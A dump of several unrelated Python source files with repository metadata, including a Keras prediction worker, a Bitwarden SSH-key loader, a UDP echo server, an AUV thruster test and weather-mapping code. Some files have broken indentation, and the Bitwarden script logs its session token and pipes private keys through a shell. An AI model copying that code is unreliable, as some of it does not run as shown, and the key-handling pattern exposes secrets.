] | 1 | 2018-10-05T00:35:18.000Z | 2018-10-05T00:35:18.000Z | import os
import json
import time
import redis
import platform
# Detect the host OS once; the keras tensorflow backend import below is
# skipped on Windows (see the `if not is_win` guard after the imports).
platform_name = platform.platform().lower()
is_win = 'windows' in platform_name
# tensorflow
import tensorflow as tf
if not is_win:
import keras.backend.tensorflow_backend as KTF
# Keras
import keras
from keras.utils import Sequence
from keras.layers import *
from keras.models import *
from keras.applications import *
from keras.optimizers import *
from keras.regularizers import *
from keras.preprocessing.image import *
from keras.applications.inception_v3 import preprocess_input
# my pkg
from config import Config
from utility import pickle_dump, pickle_load
from task import get_one_task
from feature import load_feature
from test_data import get_one_test_image_index
from predict_result import save_predict_result
from single_predict import get_single_pred
def run_task(x_test, x_train, y_train, filename_train, topn, model, redis_cli):
    """Pop one test-image index from redis, predict it, and store the result.

    Sleeps for Config.APP_SLEEP seconds when no usable index is available.
    """
    # 1. Fetch one image idx from redis
    test_image_idx = get_one_test_image_index(
        Config.REDIS_TEST_IDX_ARR_NAME, redis_cli)
    no_work = test_image_idx is None or test_image_idx >= x_test.shape[0]
    if no_work:
        print('App sleep %ds' % Config.APP_SLEEP)
        time.sleep(Config.APP_SLEEP)
        return
    # 2. Predict the top-n matches for this single test image.
    pred_result = get_single_pred(
        test_image_idx, x_test, x_train, y_train,
        filename_train, topn, model, Config.BATCH_SIZE)
    print(type(test_image_idx), test_image_idx, pred_result['id'],
          pred_result['top1_pred'], len(pred_result['topn_pred_arr']),
          pred_result['weighted_top1_pred'],
          len(pred_result['weighted_topn_pred_arr']))
    # 3. Save result to redis
    save_predict_result(
        pred_result, Config.REDIS_TEST_PREDICT_RESULT, redis_cli)
def main():
    """Connect to redis, load the model and features, then predict forever."""
    # Init redis connection
    redis_cli = redis.Redis(
        host=Config.HOST, port=Config.PORT, password=Config.PASSWORD)
    # Fetch task params from redis
    task = get_one_task(redis_cli)
    if not task:
        print('Do not have task, APP exit.')
        # Bug fix: execution previously fell through and crashed below when
        # subscripting a falsy task; actually exit as the message promises.
        return
    print(task)
    # Init tensorflow runtime params (cap GPU memory per process).
    # KTF is only imported on non-Windows platforms (see module top).
    if not is_win:
        tf_config = tf.ConfigProto()
        tf_config.gpu_options.per_process_gpu_memory_fraction = task['per_process_gpu_memory_fraction']
        tf_session = tf.Session(config=tf_config)
        KTF.set_session(tf_session)
    # Load model
    model_file = os.path.join(Config.MODEL_FILE)
    print(model_file)
    model = load_model(model_file)
    print(model.summary())
    # Load precomputed train and test feature matrices.
    x_train, y_train, filename_train, _ = load_feature(
        Config.FEATURE_FOLDER_PATH, 'train', Config.PRE_TRAINED_MODEL_NAME,
        task['model_date_str'], list(range(task['libary_batch_amount'])))
    x_test, _, _, _ = load_feature(
        Config.FEATURE_FOLDER_PATH, Config.TEST_DATA_NAME,
        Config.PRE_TRAINED_MODEL_NAME, task['model_date_str'], [1])
    # Run tasks until the process is killed.
    while True:
        run_task(x_test, x_train, y_train, filename_train,
                 task['topn'], model, redis_cli)
if __name__ == "__main__":
print('App start!')
main()
print('App finished!')
| 34.227273 | 206 | 0.737716 | 445 | 3,012 | 4.660674 | 0.27191 | 0.034716 | 0.043394 | 0.023144 | 0.222758 | 0.143202 | 0.098361 | 0.098361 | 0.098361 | 0.058824 | 0 | 0.003616 | 0.173639 | 3,012 | 87 | 207 | 34.62069 | 0.82965 | 0.069057 | 0 | 0.03125 | 0 | 0 | 0.082079 | 0.018996 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | false | 0.015625 | 0.359375 | 0 | 0.40625 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c289563298a9d3fae2e9bd1b2b3a0cf6bcdcd9b3 | 8,614 | py | Python | bw_add_sshkeys.py | raph2i/bitwarden-ssh-agent | 505cc0cb814260aceea31bf47beee5a73bf47e94 | [
"MIT"
] | null | null | null | bw_add_sshkeys.py | raph2i/bitwarden-ssh-agent | 505cc0cb814260aceea31bf47beee5a73bf47e94 | [
"MIT"
] | 1 | 2022-03-27T02:29:32.000Z | 2022-03-27T15:51:25.000Z | bw_add_sshkeys.py | raph2i/bitwarden-ssh-agent | 505cc0cb814260aceea31bf47beee5a73bf47e94 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""
Extracts SSH keys from Bitwarden vault
"""
import argparse
import json
import logging
import os
import subprocess
import pexpect
import time
from pkg_resources import parse_version
def memoize(func):
    """Decorator that caches *func*'s results, keyed by its positional args.

    Keyword arguments are not supported; calls must use hashable args.
    """
    results = {}

    def wrapper(*args):
        try:
            return results[args]
        except KeyError:
            value = func(*args)
            results[args] = value
            return value

    return wrapper
@memoize
def bwcli_version():
    """Return the Bitwarden CLI version string (cached by @memoize)."""
    # check=True raises CalledProcessError when the CLI is missing or fails.
    return subprocess.run(
        ['bw', '--version'],
        stdout=subprocess.PIPE,
        universal_newlines=True,
        check=True,
    ).stdout
@memoize
def cli_supports(feature):
    """Return True when the installed Bitwarden CLI supports *feature*."""
    version = parse_version(bwcli_version())
    # 'nointeraction' is the only feature gate known here (bw CLI >= 1.9.0).
    return feature == 'nointeraction' and version >= parse_version('1.9.0')
def get_session():
    """Return a usable Bitwarden session token.

    Reuses $BW_SESSION when set; otherwise logs in or unlocks the vault
    via the CLI and returns the token it prints.
    """
    # Check for an existing, user-supplied Bitwarden session
    session = os.environ.get('BW_SESSION')
    if session is not None:
        logging.debug('Existing Bitwarden session found')
        return session

    # 'bw login --check' exits non-zero when we are not logged in at all.
    logged_in = subprocess.run(
        ['bw', 'login', '--check', '--quiet']).returncode == 0
    if logged_in:
        logging.debug('Bitwarden vault is locked')
        operation = 'unlock'
    else:
        logging.debug('Not logged into Bitwarden')
        operation = 'login'
    return subprocess.run(
        ['bw', '--raw', operation],
        stdout=subprocess.PIPE,
        universal_newlines=True,
        check=True,
    ).stdout
def get_folders(session, foldername):
    """Return the id of the vault folder matching *foldername*, or None.

    None is returned (with an error logged) when no folder matches or when
    the search is ambiguous (more than one match).
    """
    logging.debug('Folder name: %s', foldername)
    listing = subprocess.run(
        ['bw', 'list', 'folders', '--search', foldername, '--session', session],
        stdout=subprocess.PIPE,
        universal_newlines=True,
        check=True,
    )
    folders = json.loads(listing.stdout)
    if not folders:
        logging.error('"%s" folder not found', foldername)
        return None
    if len(folders) != 1:
        # Refuse to guess between multiple matching folders.
        logging.error('%d folders with the name "%s" found', len(folders), foldername)
        return None
    return folders[0]['id']
def folder_items(session, folder_id):
    """Return the decoded list of vault items stored in *folder_id*."""
    logging.debug('Folder ID: %s', folder_id)
    listing = subprocess.run(
        ['bw', 'list', 'items', '--folderid', folder_id, '--session', session],
        stdout=subprocess.PIPE,
        universal_newlines=True,
        check=True,
    )
    return json.loads(listing.stdout)
def add_ssh_keys(session, items, keyname):
    """Try to load an SSH key from each vault item into the agent.

    session : Bitwarden session token.
    items   : decoded vault items (as returned by folder_items).
    keyname : name of the custom text field holding the private-key file name.

    Items missing the field or the attachment are skipped with a warning;
    ssh-add failures are logged but do not abort the loop.
    """
    for item in items:
        try:
            # type == 0 is a plain-text custom field.
            private_key_file = [k['value'] for k in item['fields']
                                if k['name'] == keyname and k['type'] == 0][0]
        except IndexError:
            logging.warning('No "%s" field found for item %s', keyname, item['name'])
            continue
        except KeyError as e:
            logging.debug('No key "%s" found in item %s - skipping', e.args[0], item['name'])
            continue
        logging.debug('Private key file declared')
        try:
            private_key_id = [k['id'] for k in item['attachments']
                              if k['fileName'] == private_key_file][0]
        except IndexError:
            logging.warning(
                'No attachment called "%s" found for item %s',
                private_key_file,
                item['name']
            )
            continue
        logging.debug('Private key ID found')
        try:
            # Lazy %-style args, consistent with the rest of the module
            # (was eager string concatenation).
            logging.debug('trying to add key %s', item['name'])
            ssh_add(session, item['id'], private_key_id, item['name'])
        except subprocess.SubprocessError:
            logging.warning('Could not add key to the SSH agent')
def ssh_add(session, item_id, key_id, key_name):
    """Fetch one private key from the Bitwarden vault and feed it to ssh-add.

    session : Bitwarden session token.
    item_id : vault item id holding the key (and optional passphrase field).
    key_id  : attachment id of the private-key file on that item.
    key_name: display name used only in log messages.
    """
    logging.debug('Item ID: %s', item_id)
    logging.debug('Key ID: %s', key_id)
    # Fetch the whole item so we can look for a custom 'passphrase' field.
    proc_passphrase = subprocess.run([
        'bw',
        'get',
        'item', item_id,
        '--session', session
        ],
        stdout=subprocess.PIPE,
        universal_newlines=True,
        check=True,
    )
    temp_passphrase = json.loads(proc_passphrase.stdout)
    for field in temp_passphrase['fields']:
        if field['name'] == 'passphrase':
            passphrase = field['value']
    # NOTE(review): if the item has no 'passphrase' field but ssh-add still
    # prompts, the sendline(passphrase) below raises NameError — confirm every
    # key item carries the field, or pre-initialize passphrase.
    proc_attachment = subprocess.run([
        'bw',
        'get',
        'attachment', key_id,
        '--itemid', item_id,
        '--raw',
        '--session', session
        ],
        stdout=subprocess.PIPE,
        universal_newlines=True,
        check=True,
    )
    ssh_key = proc_attachment.stdout
    logging.debug("Running ssh-add")
    # Pipe the key into ssh-add via a shell. SSH_ASKPASS_REQUIRE=never makes
    # ssh-add prompt on the tty that pexpect controls instead of via askpass.
    cmd = ' echo "' + ssh_key + ' " | ssh-add -'
    child = pexpect.spawn('sh', env=dict(os.environ, SSH_ASKPASS_REQUIRE="never"), echo=False)
    child.sendline('stty -icanon')
    # https://unix.stackexchange.com/questions/611355/does-zsh-use-canonical-mode-for-the-terminal
    # https://github.com/pexpect/pexpect/issues/55
    # https://pexpect.readthedocs.io/en/stable/api/pexpect.html (send, PC_MAX_CANON)
    # i'm using macOS with zsh as my loginshell, just works
    time.sleep(0.2)
    # Feed the command line by line: the embedded key spans many lines, and
    # the short sleeps give the shell time to consume each one.
    cmdlines = cmd.splitlines()
    for item in cmdlines:
        child.sendline(item)
        time.sleep(0.2)
    index = child.expect(['Enter passphrase for.*', '.*dentity added:.*', pexpect.TIMEOUT, pexpect.EOF], timeout=2)
    if index == 0:
        # ssh-add asked for the key's passphrase.
        logging.debug('Entering passphrase...')
        child.waitnoecho()
        child.sendline(passphrase)
        child.waitnoecho()
        passphraseindex = child.expect([pexpect.TIMEOUT, pexpect.EOF, '.*dentity added:.*', '.*ad passphrase, try again for.*'], timeout=2)
        if passphraseindex == 0:
            logging.debug('Passphrase timeout')
        if passphraseindex == 1:
            logging.debug('EOF?')
        if passphraseindex == 2:
            logging.info('Identity ' + key_name + ' added')
        if passphraseindex == 3:
            logging.error('Wrong passphrase, skipping...')
    if index == 1:
        logging.info('Identity ' + key_name + ' added, no passphrase needed')
    if index == 2:
        logging.error('Timeout')
    if index == 3:
        logging.debug('EOF?')
    child.close()
    # Drop references to the key material and passphrase.
    cmd = None
    passphrase = None
if __name__ == '__main__':
    def parse_args():
        """Build and evaluate the command-line parser for this script."""
        parser = argparse.ArgumentParser()
        parser.add_argument(
            '-d', '--debug',
            action='store_true',
            help='show debug output',
        )
        parser.add_argument(
            '-f', '--foldername',
            default='ssh-agent',
            help='folder name to use to search for SSH keys',
        )
        parser.add_argument(
            '-c', '--customfield',
            default='private',
            help='custom field name where private key filename is stored',
        )
        return parser.parse_args()

    def main():
        """Drive the workflow: session -> folder -> items -> ssh-agent."""
        args = parse_args()
        logging.basicConfig(
            level=logging.DEBUG if args.debug else logging.INFO)
        try:
            logging.info('Getting Bitwarden session')
            session = get_session()
            logging.debug('Session = %s', session)
            logging.info('Getting folder list')
            folder_id = get_folders(session, args.foldername)
            logging.info('Getting folder items')
            items = folder_items(session, folder_id)
            logging.info('Attempting to add keys to ssh-agent')
            add_ssh_keys(session, items, args.customfield)
        except subprocess.CalledProcessError as e:
            # Surface which CLI command failed; stderr may be empty.
            if e.stderr:
                logging.error('`%s` error: %s', e.cmd[0], e.stderr)
            logging.debug('Error running %s', e.cmd)

    main()
| 27.608974 | 139 | 0.582076 | 980 | 8,614 | 5.02449 | 0.246939 | 0.046304 | 0.021324 | 0.035337 | 0.147035 | 0.119821 | 0.093826 | 0.078392 | 0.078392 | 0.077173 | 0 | 0.005454 | 0.297539 | 8,614 | 311 | 140 | 27.697749 | 0.808296 | 0.112143 | 0 | 0.240385 | 0 | 0 | 0.172206 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052885 | false | 0.086538 | 0.038462 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c28ec108318e201e5db04dd093d9facb3dd88500 | 459 | py | Python | setup.py | tbrekalo/mini | dc934e6f2bec3efa6053146413db0c3561fcd39e | [
"MIT"
] | 3 | 2022-03-13T14:10:41.000Z | 2022-03-14T11:58:14.000Z | setup.py | tbrekalo/mini | dc934e6f2bec3efa6053146413db0c3561fcd39e | [
"MIT"
] | null | null | null | setup.py | tbrekalo/mini | dc934e6f2bec3efa6053146413db0c3561fcd39e | [
"MIT"
] | null | null | null | import sys
from skbuild import setup
# Package metadata; scikit-build's setup() drives a CMake build (see
# cmake_install_dir below) in addition to packaging the Python sources.
setup(
    name="minipy",
    version="1.3.0",
    author="Tvrtko Brekalo",
    author_email="brekalo.tvrtko@gmail.com",
    description="Minimizer extraction utility library as described in minimap paper",
    url="https://github.com/tbrekalo/mini",
    license="BSD",
    packages=['minipy'],
    # Python sources live under src/; CMake installs its outputs into the
    # package directory so they ship with the wheel.
    package_dir={'': 'src'},
    cmake_install_dir="src/minipy",
    include_package_data=True,
    python_requires=">=3.8"
)
| 25.5 | 85 | 0.67756 | 58 | 459 | 5.241379 | 0.793103 | 0.039474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013158 | 0.172113 | 459 | 17 | 86 | 27 | 0.786842 | 0 | 0 | 0 | 0 | 0 | 0.379085 | 0.052288 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c28f559d3b7bcf1124708b2db4c08bfa39e48118 | 903 | py | Python | cotidia/blog/migrations/0009_auto_20190602_1908.py | guillaumepiot/cotidia-blog | 80b5e8d891ca02533bfce804a2c75188501c5273 | [
"BSD-3-Clause"
] | null | null | null | cotidia/blog/migrations/0009_auto_20190602_1908.py | guillaumepiot/cotidia-blog | 80b5e8d891ca02533bfce804a2c75188501c5273 | [
"BSD-3-Clause"
] | null | null | null | cotidia/blog/migrations/0009_auto_20190602_1908.py | guillaumepiot/cotidia-blog | 80b5e8d891ca02533bfce804a2c75188501c5273 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.0.1 on 2019-06-02 19:08
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration (see header): updates Article model options,
    # renames ArticleTranslation timestamp fields, and drops its uuid field.

    dependencies = [
        ('blog', '0008_unique_uuid'),
    ]

    operations = [
        # Default ordering, custom publish permission, and verbose names.
        migrations.AlterModelOptions(
            name='article',
            options={'ordering': ['-publish_date'], 'permissions': (('publish_article', 'Can publish article'),), 'verbose_name': 'Article', 'verbose_name_plural': 'Articles'},
        ),
        # created_at -> date_created on ArticleTranslation.
        migrations.RenameField(
            model_name='articletranslation',
            old_name='created_at',
            new_name='date_created',
        ),
        # modified_at -> date_updated on ArticleTranslation.
        migrations.RenameField(
            model_name='articletranslation',
            old_name='modified_at',
            new_name='date_updated',
        ),
        migrations.RemoveField(
            model_name='articletranslation',
            name='uuid',
        ),
    ]
| 28.21875 | 176 | 0.579181 | 81 | 903 | 6.234568 | 0.567901 | 0.053465 | 0.160396 | 0.118812 | 0.217822 | 0.217822 | 0.217822 | 0 | 0 | 0 | 0 | 0.029781 | 0.293466 | 903 | 31 | 177 | 29.129032 | 0.761755 | 0.049834 | 0 | 0.36 | 1 | 0 | 0.28271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.16 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c292a5653546feabbd51f70e26a6b78a4de5afab | 956 | py | Python | example_echo_server.py | lxndrdagreat/udp-socket-server | 8ffc99286bc7eeccb8e7c0f767d643ae10b0b872 | [
"MIT"
] | 3 | 2017-07-10T13:48:27.000Z | 2019-08-04T14:26:03.000Z | example_echo_server.py | lxndrdagreat/udp-socket-server | 8ffc99286bc7eeccb8e7c0f767d643ae10b0b872 | [
"MIT"
] | null | null | null | example_echo_server.py | lxndrdagreat/udp-socket-server | 8ffc99286bc7eeccb8e7c0f767d643ae10b0b872 | [
"MIT"
] | null | null | null | from server import ThreadedUDPServer
import threading
# Create the server instance and assign the binding address for it.
# The handlers below are registered on this module-level instance.
server = ThreadedUDPServer(('localhost', 9999))
# Set up a few example event handlers
@server.on('connected')
def connected(msg, socket):
    """Log each newly connected client.

    'connected' and 'disconnected' are events reserved by the server,
    which invokes these handlers automatically.
    """
    greeting = "New client: {}".format(socket)
    print(greeting)
@server.on('message')
def got_message(msg, socket):
    """Echo a client's custom 'message' event to every connected client."""
    # Log the message with its sender, then broadcast it back out.
    line = "[{}]: {}".format(socket, msg)
    print(line)
    server.send_all('message', msg)
if __name__ == "__main__":
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
while True:
pass
server.shutdown()
| 25.157895 | 66 | 0.682008 | 120 | 956 | 5.316667 | 0.591667 | 0.056426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005291 | 0.209205 | 956 | 37 | 67 | 25.837838 | 0.838624 | 0.368201 | 0 | 0 | 0 | 0 | 0.111511 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.058824 | 0.117647 | 0 | 0.235294 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c2978c8505a4cda21678e127b5aaef6476a68d9e | 375 | py | Python | app/__init__.py | synqs/ArduinoMagnetometerLogger | 8405dd5ad17d58562b9c78743525222d84bf3c7e | [
"MIT"
] | null | null | null | app/__init__.py | synqs/ArduinoMagnetometerLogger | 8405dd5ad17d58562b9c78743525222d84bf3c7e | [
"MIT"
] | null | null | null | app/__init__.py | synqs/ArduinoMagnetometerLogger | 8405dd5ad17d58562b9c78743525222d84bf3c7e | [
"MIT"
] | null | null | null | from flask import Flask
from flask_bootstrap import Bootstrap
from flask_socketio import SocketIO
from config import Config
import eventlet
# Monkey-patch the stdlib for cooperative green-thread I/O before anything
# else touches sockets or threads.
eventlet.monkey_patch()
# where should I move this normally ?
# NOTE(review): async_mode is not read anywhere in this module — presumably
# imported by other modules; verify before removing.
async_mode = None
app = Flask(__name__)
bootstrap = Bootstrap(app)
# Socket.IO server bound to the Flask app, driven by the eventlet loop.
socketio = SocketIO(app, async_mode='eventlet')
app.config.from_object(Config)
# Imported last so that `routes` can import `app`/`socketio` from this
# module without a circular-import failure.
from app import routes
| 20.833333 | 47 | 0.808 | 53 | 375 | 5.528302 | 0.415094 | 0.09215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130667 | 375 | 17 | 48 | 22.058824 | 0.898773 | 0.093333 | 0 | 0 | 0 | 0 | 0.023669 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c29b209f7f37fc6ee82893da244c3a874a0f0905 | 4,736 | py | Python | sensors/kalman/util/measure_thrusters.py | cuauv/software | 5ad4d52d603f81a7f254f365d9b0fe636d03a260 | [
"BSD-3-Clause"
] | 70 | 2015-11-16T18:04:01.000Z | 2022-03-05T09:04:02.000Z | sensors/kalman/util/measure_thrusters.py | cuauv/software | 5ad4d52d603f81a7f254f365d9b0fe636d03a260 | [
"BSD-3-Clause"
] | 1 | 2016-08-03T05:13:19.000Z | 2016-08-03T06:19:39.000Z | sensors/kalman/util/measure_thrusters.py | cuauv/software | 5ad4d52d603f81a7f254f365d9b0fe636d03a260 | [
"BSD-3-Clause"
] | 34 | 2015-12-15T17:29:23.000Z | 2021-11-18T14:15:12.000Z | #!/usr/bin/env python2
'''
measure_thrusters.py attempts to determine the impulse response
of each thruster for system identification.
That is, suppose:
T(t) = thrust value at time t
R(t) = angular rate at time t
R(t) depends upon T(tao) for tao < t
If we assume that R is linear in T and time-invariant then
R(t) = \int_0^\infty g(k) T(t-k) dk for some function g(k), k > 0
or, discretized,
R(t) = \sum_{k=0}^\infty g(k) T(t-k)
We want to determine g(k) so that we predict R given past T values
To do this we measure R for fixed, simple inputs of T
In particular, we use a step function T=0 before t=0
and T=constant afterwards
(We stop running the thruster at some point, but this should be
long enough later that the vehicle has 'forgotten' about the
initial T=0 state.)
In this simple case then R(t) = \sum_{k=0}^t g(k) T
where T is the constant value of T(t>0)
which then gives that: g(t) = R'(t)/T which is easy to determine!
'''
from time import sleep, time
from numpy import array
import shm
# Which axis/variable we are trying to measure with.
# These are shm variable paths as strings; they are resolved with eval()
# inside the measurement loop below.
measured_vars = ['shm.imu.yaw_vel',
                 'shm.kalman.heading_rate',
                 'shm.kalman.heading',
                 'shm.dvl.velocity_x',
                 'shm.dvl.velocity_y',
                 #'shm.kalman.vely',
                 #'shm.kalman.velx',
                 'shm.kalman.depth',
                 'shm.kalman.roll',
                 'shm.kalman.pitch',
                 'shm.kalman.accelx',
                 'shm.kalman.accely',
                 ]
# shm motor_desires attribute names, one per thruster under test.
thrusters = ['port', 'starboard', 'sway_aft', 'sway_fore', 'aft', 'fore']
# PWM command values to test, in both directions.
pwm_values = [50, 75, 100, 125, 150, 175, 200, 225, 255,
              -50, -75, -100, -125, -150, -175, -200, -225, -255]

TRIAL_LENGTH = 6.0  # Seconds the thrust value is held while sampling
RESET_TIME = 4.0  # Seconds the controller holds position between trials
CALM_TIME = 4.0  # Seconds of free drift (controller disabled) before a trial
MEASUREMENT_PERIOD = 0.02  # Seconds between samples during a trial

# data[measured_var][thruster][pwm_value] -> list of recorded samples
data = dict((mv, dict((t, dict((v, []) for v in pwm_values)) for t in thrusters)) for mv in measured_vars)
if __name__ == '__main__':
start = time()
runs = []
for t in thrusters:
for v in pwm_values:
done = False
while not done:
try:
shm.motor_desires.__getattribute__(t).set(0)
# Set desired heading to current so we don't flip out
shm.navigation_desires.heading.set(shm.kalman.heading.get())
# Enable controller so that we don't go floating off
print "%0.2f: Resetting..." % (time()-start)
shm.settings_control.enabled.set(1)
sleep(RESET_TIME)
# Let sub drift with no input
shm.settings_control.enabled.set(0)
sleep(CALM_TIME)
# Hold motor value constant for a while
print "%0.2f: Trying %s at %s..." % (time()-start,t,v)
shm.motor_desires.__getattribute__(t).set(v)
# Measure data
begin = time()
count = 0
while time() < begin+TRIAL_LENGTH:
while time()-begin > count*MEASUREMENT_PERIOD:
for mv in measured_vars:
data[mv][t][v].append(eval(mv).get())
count += 1
sleep(0)
shm.motor_desires.__getattribute__(t).set(0)
# Set desired heading to current so we don't flip out
shm.navigation_desires.heading.set(shm.kalman.heading.get())
# Enable controller so that we don't go floating off
print "%0.2f: Resetting..." % (time()-start)
shm.settings_control.enabled.set(1)
sleep(RESET_TIME)
done = True
except KeyboardInterrupt:
# Clear log
data[t][v] = []
# Set desired heading to current so we don't flip out
shm.navigation_desires.heading.set(shm.kalman.heading.get())
# Enable controller so that we don't go floating off
shm.settings_control.enabled.set(1)
print "Interrupted!"
print "Stopping measurements so that the sub may be driven"
raw_input("[ENTER] when done (or CTRL-C again to kill)")
shm.settings_control.enabled.set(1)
print "Done recording!"
print "Writing output to 'thrusts.pickle'"
# Convert recorded data to arrays
data = dict( (t,dict( (v,array(x)) for v,x in d.items())) for t,d in data.items() )
# Write output:
import pickle
pickle.dump(data, open("thrusts.pickle","w"))
| 36.430769 | 106 | 0.548353 | 642 | 4,736 | 3.956386 | 0.345794 | 0.04252 | 0.014173 | 0.049213 | 0.363386 | 0.301575 | 0.28937 | 0.253937 | 0.253937 | 0.234252 | 0 | 0.027132 | 0.346284 | 4,736 | 129 | 107 | 36.713178 | 0.793282 | 0.117821 | 0 | 0.19697 | 0 | 0 | 0.138855 | 0.007081 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.060606 | null | null | 0.106061 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c29c29afa60455a7d0588c62b67fc8f7b0322e34 | 7,491 | py | Python | temps2.py | reasner/temps | 3221524187d12cf5099546b5fb3e9f0bf45a479b | [
"MIT"
] | null | null | null | temps2.py | reasner/temps | 3221524187d12cf5099546b5fb3e9f0bf45a479b | [
"MIT"
] | null | null | null | temps2.py | reasner/temps | 3221524187d12cf5099546b5fb3e9f0bf45a479b | [
"MIT"
] | null | null | null | import os
import pandas as pd
import geopandas as gpd
import matplotlib.pyplot as plt
#SETUP
# Project directories under ~/Documents/projects; PNG maps go in simple_maps/.
cd = os.path.join(os.path.expanduser("~"),r'Documents',r'projects',r'temps')
cd_dotdot = os.path.join(os.path.expanduser("~"),r'Documents',r'projects')
if not os.path.exists(os.path.join(cd,r'simple_maps')):
    os.makedirs(os.path.join(cd,r'simple_maps'))
#LOAD WEATHER
# County-level weather tables; presumably each is keyed by a 'fips' column
# (the plotting code below merges on 'fips') -- verify for precip/tmax/tmin,
# which are loaded but not plotted in this section.
extreme_df_path = os.path.join(cd,'extremes.csv')
extremes = pd.read_csv(extreme_df_path)
precip_path = os.path.join(cd,'precip.csv')
precip = pd.read_csv(precip_path)
tmax_path = os.path.join(cd,'tmax.csv')
tmax = pd.read_csv(tmax_path)
tmin_path = os.path.join(cd,'tmin.csv')
tmin = pd.read_csv(tmin_path)
tavg_path = os.path.join(cd,'tavg.csv')
tavg = pd.read_csv(tavg_path)
#LOAD MAPS
# County shapefile with a 5-digit 'fips' attribute used as the merge key.
county_shapefile_path = os.path.join(cd_dotdot,r'cfs_cz_shapefile_and_distances',r'fips',r'fips.shp')
county_map = gpd.read_file(county_shapefile_path)
#SIMPLE MAPS
def _plot_county_map(source_df, column, title, out_name):
    """Merge one weather column onto the county map and save a choropleth.

    source_df : DataFrame with a 'fips' column plus *column*.
    column    : name of the value column to plot.
    title     : plot title string.
    out_name  : output file name (PNG) under <cd>/simple_maps/.
    """
    plot_data = source_df[['fips', column]].copy()
    # Zero-pad FIPS codes to 5 characters so they match the shapefile key.
    plot_data['fips'] = plot_data['fips'].astype(str).str.zfill(5)
    merged = pd.merge(county_map, plot_data, on='fips', how='inner')
    fig, ax = plt.subplots(1, figsize=(8.5, 6.5))
    ax.axis('off')
    cmap = plt.get_cmap('bwr')
    merged.plot(ax=ax, column=column, legend=True, linewidth=0.2,
                edgecolor='gray', cmap=cmap)
    plt.title(title)
    out_path = os.path.join(cd, r'simple_maps', out_name)
    plt.savefig(out_path, bbox_inches='tight', dpi=300)
    plt.clf()


# January / July long-run average temperatures.
_plot_county_map(tavg, 'jan',
                 'Average January Temperature (1970-2000)', 'jan_avg.png')
_plot_county_map(tavg, 'jul',
                 'Average July Temperature (1970-2000)', 'jul_avg.png')

# Average number of days per year with a max air temp above each threshold.
# (Replaces nine copy-pasted stanzas, some of whose comments were mislabeled
# as "Days below ...".)
for threshold in (25, 30, 35, 45, 80, 85, 90, 95):
    _plot_county_map(
        extremes,
        'avg_daily_max_air_temp_%d' % threshold,
        'Average # of Days w/ a Max. Air Temp. Above %d (1979-2011)' % threshold,
        'above_%d.png' % threshold,
    )
